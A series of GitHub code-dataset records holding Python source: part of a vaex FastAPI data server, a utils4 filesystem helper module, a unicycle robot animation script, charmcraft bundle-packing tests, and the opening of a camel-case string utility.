openapi_tags=openapi_tags,\n docs_url=None,\n)\n\n@app.exception_handler(vaex.tasks.TaskCheckError)\nasync def task_check_exception_handler(request, exc):\n return PlainTextResponse(str(exc), status_code=413)\n\n\napp.include_router(router)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@app.get(\"/docs\", include_in_schema=False)\nasync def custom_swagger_ui_html():\n return get_swagger_ui_html(\n openapi_url=app.openapi_url,\n title=app.title + \" - Swagger UI\",\n swagger_favicon_url=VAEX_FAVICON,\n )\n\n@app.middleware(\"http\")\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n executor = vaex.dataframe.get_main_executor()\n start_passes = executor.passes\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time\"] = str(process_time)\n response.headers[\"X-Data-Passes\"] = str(executor.passes - start_passes)\n return response\n\n\n\n# used for testing\nclass Server(threading.Thread):\n def __init__(self, port, host='localhost', **kwargs):\n self.port = port\n self.host = host\n self.kwargs = kwargs\n self.started = threading.Event()\n self.stopped = threading.Event()\n super().__init__(name=\"fastapi-thread\")\n self.setDaemon(True)\n\n def set_datasets(self, dfs):\n global datasets\n dfs = {df.name: df for df in dfs}\n update_service(dfs)\n\n def run(self):\n self.mainloop()\n\n def serve_threaded(self):\n logger.debug(\"start thread\")\n self.start()\n logger.debug(\"wait for thread to run\")\n self.started.wait()\n logger.debug(\"make tornado io loop the main thread's current\")\n\n def wait_until_serving(self):\n for n in range(10):\n url = f'http://{self.host}:{self.port}/'\n try:\n response = requests.get(url)\n except requests.exceptions.ConnectionError:\n pass\n else:\n if response.status_code == 200:\n return\n time.sleep(0.05)\n else:\n raise RuntimeError(f'Server at {url} does not seem to be running')\n\n def mainloop(self):\n logger.info(\"serving at http://%s:%d\" % (self.host, self.port))\n\n from uvicorn.config import Config\n from uvicorn.server import Server\n if sys.version_info[:2] < (3, 7):\n # make python 3.6 work\n import asyncio\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n # uvloop will trigger a: RuntimeError: There is no current event loop in thread 'fastapi-thread'\n config = Config(app, host=self.host, port=self.port, **self.kwargs, loop='asyncio')\n self.server = Server(config=config)\n self.started.set()\n try:\n self.server.run()\n except:\n logger.exception(\"Oops, server stopped unexpectedly\")\n finally:\n self.stopped.set()\n\n def stop_serving(self):\n logger.debug(\"stopping server\")\n self.server.should_exit = True\n if self.stopped.wait(1) is not None:\n logger.error('stopping server failed')\n logger.debug(\"stopped server\")\n\n\nfor name, path in vaex.settings.server.files.items():\n datasets[name] = vaex.open(path).dataset\n\n\ndef add_graphql():\n import vaex.graphql\n import graphene\n from starlette.graphql import GraphQLApp\n dfs = {name: vaex.from_dataset(ds) for name, ds in datasets.items()}\n Query = vaex.graphql.create_query(dfs)\n schema = graphene.Schema(query=Query)\n app.add_route(\"/graphql\", GraphQLApp(schema=schema))\n\n\ndef ensure_example():\n if 'example' not in datasets:\n datasets['example'] = vaex.example().dataset\n\nensure_example()\n\n\ndef update_service(dfs=None):\n global service_threaded\n import vaex.server.service\n if dfs is None:\n dfs = {name: vaex.from_dataset(dataset) for name, dataset in datasets.items()}\n\n service_bare = vaex.server.service.Service(dfs)\n server_thread_count = 1\n threads_per_job = 32\n service_threaded = vaex.server.service.AsyncThreadedService(service_bare, server_thread_count, threads_per_job)\n\n\ndef main(argv=sys.argv):\n import uvicorn\n import argparse\n parser = argparse.ArgumentParser(argv[0])\n parser.add_argument(\"filename\", help=\"filename for dataset\", nargs='*')\n parser.add_argument('--add-example', default=False, action='store_true', help=\"add the example dataset\")\n parser.add_argument(\"--host\", help=\"address to bind the server to (default: %(default)s)\", default=\"0.0.0.0\")\n parser.add_argument(\"--base-url\", help=\"External base url (default is :port)\", default=None)\n parser.add_argument(\"--port\", help=\"port to listen on (default: %(default)s)\", type=int, default=8081)\n parser.add_argument('--verbose', '-v', action='count', help='show more info', default=2)\n parser.add_argument('--quiet', '-q', action='count', help=\"less info\", default=0)\n parser.add_argument('--graphql', default=vaex.settings.server.graphql, action='store_true', help=\"Add graphql endpoint\")\n config = parser.parse_args(argv[1:])\n\n verbosity = [\"ERROR\", \"WARNING\", \"INFO\", \"DEBUG\"]\n logging.getLogger(\"vaex\").setLevel(verbosity[config.verbose - config.quiet])\n\n if config.filename:\n datasets.clear()\n for path in config.filename:\n if \"=\" in path:\n name, path = path.split('=')\n df = vaex.open(path)\n datasets[name] = df.dataset\n else:\n df = vaex.open(path)\n name, _, _ = vaex.file.split_ext(os.path.basename(path))\n datasets[name] = df.dataset\n if not datasets:\n datasets['example'] = vaex.example().dataset\n if config.add_example:\n ensure_example()\n use_graphql = config.graphql\n if use_graphql:\n add_graphql()\n update_service()\n host = config.host\n port = config.port\n base_url = config.base_url\n if not base_url:\n base_url = host\n if port != 80:\n base_url += f\":{port}\"\n for name in datasets:\n line = f\"{name}: http://{base_url}/dataset/{name} for REST or ws://{base_url}/{name} for websocket\"\n logger.info(line)\n\n uvicorn.run(app, port=port, host=host)\n\n\nif __name__ == \"__main__\":\n main()\nelse:\n update_service()\n if vaex.settings.server.graphql:\n add_graphql()\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-server/vaex/server/fastapi.py","file_name":"fastapi.py","file_ext":"py","file_size_in_byte":16318,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"21656986943","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n:Purpose: This module contains tests and utilities relating to files and the\r\n filesystem.\r\n\r\n:Platform: Linux/Windows | Python 3.6+\r\n:Developer: J Berendt\r\n:Email: development@s3dev.uk\r\n\r\n:Comments: n/a\r\n\r\n:Example:\r\n\r\n Example for comparing two files::\r\n\r\n >>> from utils4 import filesys\r\n\r\n >>> filesys.compare_files(file1='/path/to/file1.txt',\r\n file2='/path/to/file2.txt')\r\n True\r\n\r\n\r\n If the files are expected to have *different* line endings, yet the\r\n contents are otherwise expected to be the same, pass the ``contents_only``\r\n argument as ``True``; as this will skip the file signature test::\r\n\r\n >>> from utils4 import filesys\r\n\r\n >>> filesys.compare_files(file1='/path/to/file1.txt',\r\n file2='/path/to/file2.txt',\r\n contents_only=True)\r\n True\r\n\r\n\"\"\"\r\n# pylint: disable=invalid-name\r\n\r\nimport os\r\nimport shutil\r\nimport stat\r\nfrom glob import glob\r\nfrom utils4.reporterror import reporterror\r\ntry:\r\n from natsort import natsorted\r\n _IMP_NATSORT = True\r\nexcept ImportError:\r\n # Built-in sorting will be used instead.\r\n _IMP_NATSORT = False\r\n\r\n_SIZE = 16*1024 # 16 KiB\r\n\r\n\r\ndef compare_files(file1: str,\r\n file2: str,\r\n encoding: str='utf-8',\r\n contents_only: bool=False,\r\n sig_only: bool=False) -> bool:\r\n \"\"\"Test if two files are the same.\r\n\r\n This method is *modelled* after the built-in :func:`~filecmp.cmp` function,\r\n yet has been modified to *ignore* line endings. Meaning, if two files have\r\n the same signature and the contents are the same, except for the line\r\n endings, a result of True is returned.\r\n\r\n Args:\r\n file1 (str): Full path to a file to be tested.\r\n file2 (str): Full path to a file to be tested.\r\n encoding (str, optional): Encoding to be used when reading the files.\r\n Defaults to 'utf-8'.\r\n contents_only (bool, optional): Only compare the file contents, do not\r\n test the signatures. This is useful if the line endings are\r\n expected to be different, as a file with DOS line endings will be\r\n marginally larger than a file with UNIX line endings; meaning\r\n the file signature test will *fail*. Defaults to False.\r\n sig_only (bool, optional): Only compare the file signatures. The files'\r\n contents are *not* compared. Defaults to False.\r\n\r\n :Tests:\r\n If any of the following tests fail, a value of False is returned\r\n immediately, and no further tests are conducted.\r\n\r\n The following tests are conducted, given default function parameters:\r\n\r\n - Test both files are 'regular' files.\r\n - Test the files have the same size (in bytes), they are both regular\r\n files and their inode mode is the same.\r\n - Test the contents are the same; ignoring line endings.\r\n\r\n Returns:\r\n bool: True if *all* tests pass, indicating the files are the same;\r\n otherwise False.\r\n\r\n \"\"\"\r\n if contents_only:\r\n return _compare_content(file1=file1, file2=file2, encoding=encoding)\r\n sig1 = _sig(file1)\r\n sig2 = _sig(file2)\r\n if sig1[1] != stat.S_IFREG | sig2[1] != stat.S_IFREG:\r\n return False\r\n if sig_only:\r\n # Only compare signatures.\r\n return sig1 == sig2\r\n if sig1 != sig2:\r\n # Shortcut to bypass file content compare.\r\n return False\r\n return _compare_content(file1=file1, file2=file2, encoding=encoding)\r\n\r\ndef dirsplit(path: str,\r\n nfiles: int,\r\n pattern: str='*',\r\n pairs: bool=False,\r\n repl: tuple=(None,)) -> bool:\r\n \"\"\"Move all files from a single directory into (n) sub-directories.\r\n\r\n Args:\r\n path (str): Full path to the source files. Additionally, all files\r\n will be moved into sub-directories in this path.\r\n nfiles (int): Number of source files to be moved into each directory.\r\n pattern (str, optional): A shell-style wildcard pattern used for\r\n collecting the source files. For example: ``*.csv``.\r\n Defaults to '*'.\r\n pairs (bool, optional): Are the files in paris?. If True, the ``repl``\r\n argument is used to replace a substring of the source file with\r\n that of the paired file, so each file pair is moved into the same\r\n directory. Defaults to False.\r\n repl (tuple, optional): A tuple containing the old and new replacement\r\n strings. This argument is only in effect if the ``pairs`` argument\r\n is True. Defaults to (None,).\r\n\r\n For example::\r\n\r\n ('_input.csv', '_output.txt')\r\n\r\n Raises:\r\n FileNotFoundError: If the input file path does not exist.\r\n\r\n Returns:\r\n bool: True if the operation completes, otherwise False.\r\n\r\n \"\"\"\r\n if not os.path.exists(path):\r\n raise FileNotFoundError('The requested path does not exist.')\r\n success = False\r\n try:\r\n # Setup.\r\n files = [f for f in glob(os.path.join(path, pattern)) if os.path.isfile(f)]\r\n files = natsorted(files) if _IMP_NATSORT else sorted(files)\r\n total = len(files)\r\n i = nfiles\r\n dirnum = 0\r\n # File iterator.\r\n for idx, file in enumerate(files, 1):\r\n # Define the (next) copy-to directory and create it.\r\n if i >= nfiles:\r\n i = 0\r\n dirnum += 1\r\n dirnam = str(dirnum).zfill(2)\r\n dirpath = os.path.join(path, dirnam)\r\n if not os.path.exists(dirpath):\r\n os.mkdir(path=dirpath)\r\n # Copy source file.\r\n base = os.path.basename(file)\r\n dst = os.path.join(path, dirnam, base)\r\n print(f'Moving {idx} of {total}: {base} -> {dirnam}')\r\n shutil.move(src=file, dst=dst)\r\n _file_move_test(fpath=dst)\r\n if pairs:\r\n # Copy paired file.\r\n base2 = base.replace(*repl)\r\n dst2 = os.path.join(path, dirnam, base2)\r\n print(rf'\\t\\-- {base2} -> {dirnam}')\r\n shutil.move(src=os.path.join(path, base2), dst=dst2)\r\n _file_move_test(fpath=dst2)\r\n i += 1\r\n success = True\r\n except FileNotFoundError as ferr: # progma nocover (cannot test)\r\n # Designed to catch / print file move errors from _file_move_test().\r\n print(ferr)\r\n except Exception as err:\r\n reporterror(err)\r\n return success\r\n\r\ndef _compare_content(file1: str, file2: str, encoding: str='utf-8') -> bool:\r\n \"\"\"Compare the content of each file.\r\n\r\n Args:\r\n file1 (str): Full path to a file to be tested.\r\n file2 (str): Full path to a file to be tested.\r\n encoding (str, optional): Encoding to be used when reading the files.\r\n Defaults to 'utf-8'.\r\n\r\n This function short-circuits once a difference is found and immediately\r\n returns False.\r\n\r\n Returns:\r\n bool: True if the file contents are the same, otherwise False.\r\n\r\n \"\"\"\r\n with open(file1, 'r', encoding=encoding) as f1, open(file2, 'r', encoding=encoding) as f2:\r\n while True:\r\n data1 = f1.read(_SIZE)\r\n data2 = f2.read(_SIZE)\r\n if data1 != data2:\r\n return False\r\n # Both files have reached EOF and are the same.\r\n if not data1 and not data2:\r\n return True\r\n\r\ndef _file_move_test(fpath: str) -> bool:\r\n \"\"\"Test a file exists.\r\n\r\n This method is used to verify the subject file was moved successfully.\r\n\r\n Args:\r\n fpath (str): File path to be tested.\r\n\r\n Raises:\r\n FileNotFoundError: If the subject file does not exist.\r\n\r\n Returns:\r\n bool: True if the file was moved successfully, otherwise False.\r\n\r\n \"\"\"\r\n if not os.path.exists(fpath):\r\n msg = ('\\nThe following file was not copied successfully. Processing aborted.\\n'\r\n f'-- {fpath}\\n')\r\n raise FileNotFoundError(msg)\r\n return True\r\n\r\ndef _sig(file: str) -> tuple:\r\n \"\"\"Build a tuple containing elements of a file's signature.\r\n\r\n Args:\r\n file (str): Full path to the file to be tested.\r\n\r\n Returns:\r\n tuple: A tuple containing elements of the file's signature, as::\r\n\r\n (file size, file type, inode mode)\r\n\r\n \"\"\"\r\n st = os.stat(file)\r\n return (st.st_size, stat.S_IFMT(st.st_mode), st.st_mode)\r\n","repo_name":"S3DEV/utils4","sub_path":"utils4/filesys.py","file_name":"filesys.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22873377978","text":"import numpy as np \nfrom unicycle import Unicycle\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FFMpegWriter\n\nmetadata = dict(title = 'Movie Test', artist = \"Matplotlib\", comment = \"Movie support!\")\nwriter = FFMpegWriter(fps=15, metadata = metadata)\n\n\nplt.ion()\nfig = plt.figure()\nax = plt.axes(xlim = (0,7), ylim = (-0.5,8))\n\nrobot = Unicycle(np.array([0,0,0]).reshape(-1,1), 0.01, ax)\n\nwith writer.saving(fig, 'test.mp4', 100):\n\n\tfor i in range(1000):\n\t\tv = 1.0\n\t\tw = np.pi/6\n\t\tu = np.array([v,w]).reshape(-1,1)\n\t\trobot.step(u)\n\t\trobot.render_plot()\n\t\t\n\t\tfig.canvas.draw()\n\t\tfig.canvas.flush_events()\n\t\n\t\twriter.grab_frame()\n\n\n\nplt.ioff() \nprint(\"DONE!\")","repo_name":"n-campbell/ROB590","sub_path":"unicycle_main.py","file_name":"unicycle_main.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7489827506","text":"import datetime\nimport logging\nimport pathlib\nimport zipfile\nfrom argparse import ArgumentParser, Namespace\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport yaml\n\nfrom charmcraft.cmdbase import CommandError\nfrom charmcraft.commands import pack\nfrom charmcraft.commands.pack import PackCommand, build_zip\nfrom charmcraft.config import Project\nfrom charmcraft.utils import SingleOptionEnsurer, useful_filepath\n\n# empty namespace\nnoargs = Namespace(\n entrypoint=None,\n requirement=None,\n bases_index=[],\n destructive_mode=False,\n force=None,\n)\n\n\n@pytest.fixture\ndef bundle_yaml(tmp_path):\n \"\"\"Create an empty bundle.yaml, with the option to set values to it.\"\"\"\n bundle_path = tmp_path / \"bundle.yaml\"\n bundle_path.write_text(\"{}\")\n content = {}\n\n def func(*, name):\n content[\"name\"] = name\n encoded = yaml.dump(content)\n bundle_path.write_text(encoded)\n return encoded\n\n return func\n\n\n# -- tests for the project type decissor\n\n\ndef test_resolve_charm_type(config):\n \"\"\"The config indicates the project is a charm.\"\"\"\n config.set(type=\"charm\")\n cmd = PackCommand(\"group\", config)\n\n with patch.object(cmd, \"_pack_charm\") as mock:\n cmd.run(noargs)\n mock.assert_called_with(noargs)\n\n\ndef test_resolve_bundle_type(config):\n \"\"\"The config indicates the project is a bundle.\"\"\"\n config.set(type=\"bundle\")\n cmd = PackCommand(\"group\", config)\n\n with patch.object(cmd, \"_pack_bundle\") as mock:\n cmd.run(noargs)\n mock.assert_called_with()\n\n\ndef test_resolve_no_config_packs_charm(config, tmp_path):\n \"\"\"There is no config, so it's decided to pack a charm.\"\"\"\n config.set(\n project=Project(\n config_provided=False,\n dirpath=tmp_path,\n started_at=datetime.datetime.utcnow(),\n )\n )\n cmd = PackCommand(\"group\", config)\n\n with patch.object(cmd, \"_pack_charm\") as mock:\n cmd.run(noargs)\n mock.assert_called_with(noargs)\n\n\ndef test_resolve_bundle_with_requirement(config):\n \"\"\"The requirement option is not valid when packing a bundle.\"\"\"\n config.set(type=\"bundle\")\n args = Namespace(requirement=\"reqs.txt\", entrypoint=None)\n\n with pytest.raises(CommandError) as cm:\n PackCommand(\"group\", config).run(args)\n assert str(cm.value) == \"The -r/--requirement option is valid only when packing a charm\"\n\n\ndef test_resolve_bundle_with_entrypoint(config):\n \"\"\"The entrypoint option is not valid when packing a bundle.\"\"\"\n config.set(type=\"bundle\")\n args = Namespace(requirement=None, entrypoint=\"mycharm.py\")\n\n with pytest.raises(CommandError) as cm:\n PackCommand(\"group\", config).run(args)\n assert str(cm.value) == \"The -e/--entry option is valid only when packing a charm\"\n\n\n# -- tests for main bundle building process\n\n\ndef test_bundle_simple_succesful_build(tmp_path, caplog, bundle_yaml, bundle_config):\n \"\"\"A simple happy story.\"\"\"\n caplog.set_level(logging.INFO, logger=\"charmcraft.commands\")\n\n # mandatory files (other thant the automatically provided manifest)\n content = bundle_yaml(name=\"testbundle\")\n bundle_config.set(type=\"bundle\")\n (tmp_path / \"README.md\").write_text(\"test readme\")\n\n # build!\n PackCommand(\"group\", bundle_config).run(noargs)\n\n # check\n zipname = tmp_path / \"testbundle.zip\"\n zf = zipfile.ZipFile(zipname)\n assert \"charmcraft.yaml\" not in [x.filename for x in zf.infolist()]\n assert zf.read(\"bundle.yaml\") == content.encode(\"ascii\")\n assert zf.read(\"README.md\") == b\"test readme\"\n\n expected = \"Created '{}'.\".format(zipname)\n assert [expected] == [rec.message for rec in caplog.records]\n\n # check the manifest is present and with particular values that depend on given info\n manifest = yaml.safe_load(zf.read(\"manifest.yaml\"))\n assert manifest[\"charmcraft-started-at\"] == bundle_config.project.started_at.isoformat() + \"Z\"\n\n # verify that the manifest was not leftover in user's project\n assert not (tmp_path / \"manifest.yaml\").exists()\n\n\ndef test_bundle_missing_bundle_file(tmp_path, bundle_config):\n \"\"\"Can not build a bundle without bundle.yaml.\"\"\"\n # build without a bundle.yaml!\n with pytest.raises(CommandError) as cm:\n PackCommand(\"group\", bundle_config).run(noargs)\n assert str(cm.value) == (\n \"Missing or invalid main bundle file: '{}'.\".format(tmp_path / \"bundle.yaml\")\n )\n\n\ndef test_bundle_missing_other_mandatory_file(tmp_path, bundle_config, bundle_yaml):\n \"\"\"Can not build a bundle without any of the mandatory files.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(type=\"bundle\")\n\n # build without a README!\n with pytest.raises(CommandError) as cm:\n PackCommand(\"group\", bundle_config).run(noargs)\n assert str(cm.value) == \"Missing mandatory file: {!r}.\".format(str(tmp_path / \"README.md\"))\n\n\ndef test_bundle_missing_name_in_bundle(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Can not build a bundle without name.\"\"\"\n bundle_config.set(type=\"bundle\")\n\n # build!\n with pytest.raises(CommandError) as cm:\n PackCommand(\"group\", bundle_config).run(noargs)\n assert str(cm.value) == (\n \"Invalid bundle config; \"\n \"missing a 'name' field indicating the bundle's name in file '{}'.\".format(\n tmp_path / \"bundle.yaml\"\n )\n )\n\n\n# -- tests for get paths helper\n\n\ndef test_prime_mandatory_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Simple succesful case getting all mandatory files.\"\"\"\n bundle_yaml(name=\"testbundle\")\n test_mandatory = [\"foo.txt\", \"bar.bin\"]\n test_file1 = tmp_path / \"foo.txt\"\n test_file1.touch()\n test_file2 = tmp_path / \"bar.bin\"\n test_file2.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", test_mandatory):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"foo.txt\" in zipped_files\n assert \"bar.bin\" in zipped_files\n\n\ndef test_prime_extra_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Extra files were indicated ok.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"f2.txt\", \"f1.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n testfile2 = tmp_path / \"f2.txt\"\n testfile2.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"f1.txt\" in zipped_files\n assert \"f2.txt\" in zipped_files\n\n\ndef test_prime_extra_missing(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Extra files were indicated but not found.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"f2.txt\", \"f1.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n with pytest.raises(CommandError) as err:\n PackCommand(\"group\", bundle_config).run(noargs)\n assert str(err.value) == (\n \"Parts processing error: Failed to copy '{}/build/stage/f2.txt': \"\n \"no such file or directory.\".format(tmp_path)\n )\n\n\ndef test_prime_extra_long_path(tmp_path, bundle_yaml, bundle_config):\n \"\"\"An extra file can be deep in directories.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"foo/bar/baz/extra.txt\"])\n testfile = tmp_path / \"foo\" / \"bar\" / \"baz\" / \"extra.txt\"\n testfile.parent.mkdir(parents=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"foo/bar/baz/extra.txt\" in zipped_files\n\n\ndef test_prime_extra_wildcards_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Use wildcards to specify several files ok.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"*.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n testfile2 = tmp_path / \"f2.bin\"\n testfile2.touch()\n testfile3 = tmp_path / \"f3.txt\"\n testfile3.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"f1.txt\" in zipped_files\n assert \"f2.bin\" not in zipped_files\n assert \"f3.txt\" in zipped_files\n\n\ndef test_prime_extra_wildcards_not_found(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Use wildcards to specify several files but nothing found.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"*.txt\"])\n\n # non-existent files are not included if using a wildcard\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert zipped_files == [\"manifest.yaml\"]\n\n\ndef test_prime_extra_globstar(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Double star means whatever directories are in the path.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"lib/**/*\"])\n srcpaths = (\n (\"lib/foo/f1.txt\", True),\n (\"lib/foo/deep/fx.txt\", True),\n (\"lib/bar/f2.txt\", True),\n (\"lib/f3.txt\", True),\n (\"extra/lib/f.txt\", False),\n (\"libs/fs.txt\", False),\n )\n\n for srcpath, expected in srcpaths:\n testfile = tmp_path / pathlib.Path(srcpath)\n testfile.parent.mkdir(parents=True, exist_ok=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n for srcpath, expected in srcpaths:\n assert (srcpath in zipped_files) == expected\n\n\ndef test_prime_extra_globstar_specific_files(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Combination of both mechanisms.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"lib/**/*.txt\"])\n srcpaths = (\n (\"lib/foo/f1.txt\", True),\n (\"lib/foo/f1.nop\", False),\n (\"lib/foo/deep/fx.txt\", True),\n (\"lib/foo/deep/fx.nop\", False),\n (\"lib/bar/f2.txt\", True),\n (\"lib/bar/f2.nop\", False),\n (\"lib/f3.txt\", True),\n (\"lib/f3.nop\", False),\n (\"extra/lib/f.txt\", False),\n (\"libs/fs.nop\", False),\n )\n\n for srcpath, expected in srcpaths:\n testfile = tmp_path / pathlib.Path(srcpath)\n testfile.parent.mkdir(parents=True, exist_ok=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n for srcpath, expected in srcpaths:\n assert (srcpath in zipped_files) == expected\n\n\n# -- tests for zip builder\n\n\ndef test_zipbuild_simple(tmp_path):\n \"\"\"Build a bunch of files in the zip.\"\"\"\n build_dir = tmp_path / \"somedir\"\n build_dir.mkdir()\n\n testfile1 = build_dir / \"foo.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n subdir = build_dir / \"bar\"\n subdir.mkdir()\n testfile2 = subdir / \"baz.txt\"\n testfile2.write_bytes(b\"mo\\xc3\\xb1o\")\n\n zip_filepath = tmp_path / \"testresult.zip\"\n build_zip(zip_filepath, build_dir)\n\n zf = zipfile.ZipFile(zip_filepath)\n assert sorted(x.filename for x in zf.infolist()) == [\"bar/baz.txt\", \"foo.txt\"]\n assert zf.read(\"foo.txt\") == b\"123\\x00456\"\n assert zf.read(\"bar/baz.txt\") == b\"mo\\xc3\\xb1o\"\n\n\ndef test_zipbuild_symlink_simple(tmp_path):\n \"\"\"Symlinks are supported.\"\"\"\n build_dir = tmp_path / \"somedir\"\n build_dir.mkdir()\n\n testfile1 = build_dir / \"real.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n testfile2 = build_dir / \"link.txt\"\n testfile2.symlink_to(testfile1)\n\n zip_filepath = tmp_path / \"testresult.zip\"\n build_zip(zip_filepath, build_dir)\n\n zf = zipfile.ZipFile(zip_filepath)\n assert sorted(x.filename for x in zf.infolist()) == [\"link.txt\", \"real.txt\"]\n assert zf.read(\"real.txt\") == b\"123\\x00456\"\n assert zf.read(\"link.txt\") == b\"123\\x00456\"\n\n\ndef test_zipbuild_symlink_outside(tmp_path):\n \"\"\"No matter where the symlink points to.\"\"\"\n # outside the build dir\n testfile1 = tmp_path / \"real.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n\n # inside the build dir\n build_dir = tmp_path / \"somedir\"\n build_dir.mkdir()\n testfile2 = build_dir / \"link.txt\"\n testfile2.symlink_to(testfile1)\n\n zip_filepath = tmp_path / \"testresult.zip\"\n build_zip(zip_filepath, build_dir)\n\n zf = zipfile.ZipFile(zip_filepath)\n assert sorted(x.filename for x in zf.infolist()) == [\"link.txt\"]\n assert zf.read(\"link.txt\") == b\"123\\x00456\"\n\n\n# tests for the main charm building process -- so far this is only using the \"build\" command\n# infrastructure, until we migrate the (adapted) behaviour to this command\n\n\ndef test_charm_parameters_requirement(config):\n \"\"\"The --requirement option implies a set of validations.\"\"\"\n cmd = PackCommand(\"group\", config)\n parser = ArgumentParser()\n cmd.fill_parser(parser)\n (action,) = [action for action in parser._actions if action.dest == \"requirement\"]\n assert action.type is useful_filepath\n\n\ndef test_charm_parameters_entrypoint(config):\n \"\"\"The --entrypoint option implies a set of validations.\"\"\"\n cmd = PackCommand(\"group\", config)\n parser = ArgumentParser()\n cmd.fill_parser(parser)\n (action,) = [action for action in parser._actions if action.dest == \"entrypoint\"]\n assert isinstance(action.type, SingleOptionEnsurer)\n assert action.type.converter is useful_filepath\n\n\ndef test_charm_parameters_validator(config, tmp_path):\n \"\"\"Check that build.Builder is properly called.\"\"\"\n args = Namespace(\n destructive_mode=True,\n requirement=\"test-reqs\",\n entrypoint=\"test-epoint\",\n bases_index=[],\n force=True,\n )\n config.set(\n type=\"charm\",\n project=Project(dirpath=tmp_path, started_at=datetime.datetime.utcnow()),\n )\n with patch(\"charmcraft.commands.build.Validator\", autospec=True) as validator_class_mock:\n validator_class_mock.return_value = validator_instance_mock = MagicMock()\n with patch(\"charmcraft.commands.build.Builder\"):\n PackCommand(\"group\", config).run(args)\n validator_instance_mock.process.assert_called_with(\n Namespace(\n **{\n \"destructive_mode\": True,\n \"from\": tmp_path,\n \"requirement\": \"test-reqs\",\n \"entrypoint\": \"test-epoint\",\n \"bases_indices\": [],\n \"force\": True,\n }\n )\n )\n\n\ndef test_charm_builder_infrastructure_called(config):\n \"\"\"Check that build.Builder is properly called.\"\"\"\n config.set(type=\"charm\")\n with patch(\"charmcraft.commands.build.Validator\", autospec=True) as validator_mock:\n validator_mock(config).process.return_value = \"processed args\"\n with patch(\"charmcraft.commands.build.Builder\") as builder_class_mock:\n builder_class_mock.return_value = builder_instance_mock = MagicMock()\n PackCommand(\"group\", config).run(noargs)\n builder_class_mock.assert_called_with(\"processed args\", config)\n builder_instance_mock.run.assert_called_with([], destructive_mode=False)\n","repo_name":"heitorPB/charmcraft","sub_path":"tests/commands/test_pack.py","file_name":"test_pack.py","file_ext":"py","file_size_in_byte":15580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18862101156","text":"import re\n\ndef capitalize(word):\n return word[0:1].upper() + word[1:].lower()\n\ndef lowercase(word):\n return word.lower()\n\n\ndef camel_case(sentence):\n\n remove_multiple_spaces = re.sub(r'\\s+', ' ', sentence) \n remove_surrounding_space = remove_multiple_spaces.strip() \n words = 